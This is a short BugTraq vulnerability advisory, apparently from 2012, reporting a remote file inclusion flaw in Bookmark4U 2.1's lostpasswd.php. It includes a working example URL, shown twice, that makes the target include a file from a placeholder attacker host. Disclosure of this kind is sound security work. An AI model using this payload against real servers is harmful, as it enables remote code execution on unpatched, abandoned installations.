BugTraq
Back to list
|
Post reply
Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI
Jul 02 2012 07:01AM
BugsNotHugs (bugsnothugs gmail com)
vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued
example -
http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http:/
/[attacker]/path/to/file.txt???
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued
example -
http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http:/
/[attacker]/path/to/file.txt???
[ reply ]